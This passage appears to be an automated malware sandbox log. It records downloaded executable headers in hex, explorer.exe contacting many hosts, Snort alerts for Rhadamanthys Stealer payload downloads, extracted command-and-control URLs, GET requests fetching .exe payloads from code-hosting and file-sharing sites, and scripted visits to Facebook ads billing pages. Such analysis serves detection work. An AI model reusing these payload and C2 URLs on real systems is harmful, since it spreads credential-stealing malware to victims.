00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 14 0b 1c 00 00 70 01 00 00 26 09 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 69 78 6f 00 00 00 05 00 00 00 00 80 1d 00 00 02 00 00 00 88 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 6f 62 6f 00 00 00 00 04 00 00 00 90 1d 00 00 04 00 00 00 8a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 68 00 00 00 a0 1d 00 00 6a 00 00 00 8e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Wed, 15 Feb 2023 15:05:27 GMTContent-Type: application/octet-streamContent-Length: 3826176Last-Modified: Wed, 15 Feb 2023 15:00:04 GMTConnection: keep-aliveETag: "63ecf374-3a6200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd d7 5b 6a f9 b6 35 39 f9 b6 35 39 f9 b6 35 39 6a f8 ad 39 f8 b6 35 39 96 c0 ab 39 e0 b6 35 39 96 c0 9f 39 95 b6 35 39 f0 ce a6 39 fc b6 35 39 f9 b6 34 39 85 b6 35 39 96 c0 9e 39 dc b6 35 39 96 c0 af 39 f8 b6 35 39 96 c0 a8 39 f8 b6 35 39 52 69 63 68 f9 b6 35 39 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f be 39 62 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 5e 01 00 00 2e 4c 00 00 00 00 00 99 83 00 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 4f 00 00 04 00 00 2e 90 3a 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 62 01 00 3c 00 00 00 00 10 4d 00 e8 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 42 00 00 18 00 00 00 80 42 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 5d 01 00 00 10 00 00 00 5e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 54 75 4b 00 00 70 01 00 00 90 38 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6f 64 75 72 00 00 05 00 00 00 00 f0 4c 00 00 02 00 00 00 f2 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 69 6d 6f 6c 65 00 00 04 00 00 00 00 4d 00 00 04 00 00 00 f4 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 48 02 00 00 10 4d 00 00 6a 00 00 00 f8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Feb 2023 15:05:36 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40Last-Modified: Mon, 13 Feb 2023 14:34:29 GMTETag: "51400-5f495beaee328"Accept-Ranges: bytesContent-Length: 332800Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c1 67 e2 1a 85 06 8c 49 85 06 8c 49 85 06 8c 49 16 48 14 49 84 06 8c 49 ea 70 12 49 9f 06 8c 49 ea 70 26 49 f7 06 8c 49 8c 7e 1f 49 80 06 8c 49 85 06 8d 49 f9 06 8c 49 ea 70 27 49 a0 06 8c 49 ea 70 16 49 84 06 8c 49 ea 70 11 49 84 06 8c 49 52 69 63 68 85 06 8c 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 53 0a 71 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 7a 01 00 00 a6 16 00 00 00 00 00 63 96 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 18 00 00 04 00 00 7d 81 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 7d 01 00 3c 00 00 00 00 c0 17 00 08 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 4f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b8 2c 16 00 00 90 01 00 00 46 03 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 4e 00 00 00 c0 17 00 00 50 00 00 00 c4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: C:\Windows\explorer.exe	Network Connect: 189.143.218.79 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	Network Connect: 104.21.18.99 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: perficut.at
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Domain query: smartbot.dev
Source: C:\Windows\explorer.exe	Network Connect: 144.76.136.153 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.114.9.88 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 109.206.243.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.192.141.1 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.171.233.126 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 79.102.150.149 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.shorturl.at
Source: C:\Windows\explorer.exe	Network Connect: 45.154.253.152 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 67.199.248.10 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: ads-optimization-of-meta.web.app
Source: C:\Windows\explorer.exe	Network Connect: 45.15.156.204 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.158.162.200 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: github.com
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.3 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.4 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.106.124.133 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: cdn-153.hotfile.io
Source: C:\Windows\explorer.exe	Network Connect: 58.235.189.192 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 199.36.158.100 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: uaery.top
Source: C:\Windows\explorer.exe	Network Connect: 80.85.241.98 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.96.151.46 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: beg.com.ve
Source: C:\Windows\explorer.exe	Network Connect: 176.61.150.108 443	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: bit.ly
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: shorturl.at
Source: C:\Windows\explorer.exe	Domain query: hotfile.io
Source: C:\Windows\explorer.exe	Network Connect: 104.234.118.34 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 86.122.83.142 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: autoacores.com

Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.6:59504 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.6:49718 -> 179.43.176.6:80
Source: Traffic	Snort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 179.43.176.6:80 -> 192.168.2.6:49718

Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz
Source: C:\Windows\explorer.exe	DNS query: c3g6gx853u6j.xyz

Source: Malware configuration extractor	URLs: http://bihsy.com/test2/get.php
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/

Source: global traffic	HTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: autoacores.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /systems/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: beg.com.ve
Source: global traffic	HTTP traffic detected: GET /evgenfaraday/mytoy/raw/main/5454543.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shorturl.at
Source: global traffic	HTTP traffic detected: GET /hpINT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.shorturl.at
Source: global traffic	HTTP traffic detected: GET /3RaZ238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /tollandrew/aboba/downloads/yaplakalkogdavieli.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /%23/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ads-optimization-of-meta.web.app
Source: global traffic	HTTP traffic detected: GET /kdrbr1W2y7/916c52d4-1675638446/Xzswnwa.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-153.hotfile.io
Source: global traffic	HTTP traffic detected: GET /kdrbr1W2y7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hotfile.io
Source: global traffic	HTTP traffic detected: GET /preterka/PreterHello/raw/main/QueenPars.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /get/yVhGA8/app.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /Japoi111/azazazd/blob/main/t5mu6zi.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic	HTTP traffic detected: GET /5XqFyc/brazilx86.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic	HTTP traffic detected: GET /media/smartbot.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: smartbot.dev
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic	HTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic	HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
